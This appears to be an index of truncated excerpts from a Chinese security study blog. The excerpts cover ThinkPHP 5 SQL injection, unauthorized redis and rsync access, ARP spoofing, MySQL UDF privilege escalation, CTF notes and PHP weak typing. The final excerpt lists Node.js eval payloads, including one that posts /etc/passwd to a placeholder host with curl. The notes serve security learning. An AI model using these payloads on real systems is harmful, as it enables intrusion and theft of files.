配置通过以下命令获取测试环境代码:
1composer create-project --prefer-dist topthink/think=5.0.10 tpdemo
将 composer.json 文件的 require 字段设置成如下:
1234"require": { "php": ">=5.4.0", "topthink/framework": "5.0.10"},
然后执行 composer update ,并将 applicatio...
参考学习连接
https://github.com/Mochazz/ThinkPHP-Vuln/blob/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A52.md漏洞简介thinkphp/library/think/db/builder/Mysql.php中的parseArrayData没有对传入的数据进行过滤,导致可拼接sql语句,造成sql注入
配置1234567891011121314151617181920212223242526272829...
参考学习链接
https://github.com/Mochazz/ThinkPHP-Vuln/blob/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A51.md简介thinkphp/library/think/db/Builder.php中的parseData对传入的字符没有进行检测,拼接到了sql语句中,导致了sql注入
配置环境
下载源码
12345678910#composer 选择特定分支composer create-project --...
redis未授权访问link:https://hackerqwq.github.io/2021/04/19/redis%E6%94%BB%E9%98%B2%E5%88%A9%E7%94%A8%E9%9D%A2%E6%80%BB%E7%BB%93/
通过RESP工具连接
rsync未授权访问漏洞简介rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
默认无账号密码,可直接访问
漏洞利用
nmap扫描端口发现rsync端...
arp欺骗原理每个主机都有IP和MAC地址对应的关系的缓存表,由于在局域网内主机的数据传输依靠的是MAC地址进行数据传输,并且不会验证是否向对方发送过ARP请求包,因此可以通过替换目标主机的缓存表来达到arp欺骗的目的
实现arp欺骗
使用工具:arpspoof(包含在dsniff工具中)
平台:kali
步骤查看自己ip1ifconfig -a
查看局域网内ip此处有多个命令,推荐三个常用的
123arp-scan -lfping -g C段(扫描存活主机,但是没有mac地址)netdiscover -r 网段/24
这是fping -g的截图
ARP欺骗
开启IP转发1echo ...
UDF定义UDF (user defined function)**,即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,可以通过导入dll文件增加新的函数**,执行系统命令
UDF提权步骤查看secure_file_priv的值1234show global variables like 'secure%'; 当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权 当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/...
前言单纯记录下考点
WEBupload考点
文件上传绕过
unicode欺骗
做题同目录两个源码,index.php,example.php(须扫目录)
12345678910111213141516171819202122232425262728293031<?phpif (!isset($_GET["ctf"])) { highlight_file(__FILE__); die();}if(isset($_GET["ctf"])) $ctf = $_GET["ctf"];if(...
松散比较当比较类型不同时自动转换类型
1234<?phpvar_dump(null ==false); //bool(true)var_dump('aa'==0); //bool(true)?>
Hash函数绕过https://hackerqwq.github.io/2020/06/10/MD5-collision/
弱类型函数is_numeric()is_numeric() 检测变量是否为数字或数字字符串。如果 是数字和数字字符串则返回 TRUE,否则返回 FALSE。
它的弱类型问题是他支持十六进制0x格式,攻击者把payload改成十六进制0x,i...
代码执行漏洞形成原因:客户端提交的参数,未经任何过滤,传入可以执行代码的函数,造成代码执行漏洞。常见代码注射函数:如:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、create_function等函数漏洞危害:执行代码,写入webshell、控制服务器
示例代码:
12345678910111213141516171819202122<?php/*# -*- coding: utf-8 -*-# @Author: 羽# @Date: 2020-09-05 20:31:22# @Last Modif...
参考链接:Node.js 常见漏洞学习与总结
eval导致的命令执行常见payload弹计算器(windows):
1/eval?q=require('child_process').exec('calc');
读取文件(linux):
12/eval?q=require('child_process').exec('curl -F "x=`cat /etc/passwd`" http://vps');;curl -F参数用于传输二进制文件
反弹shell(linux):
12345/ev...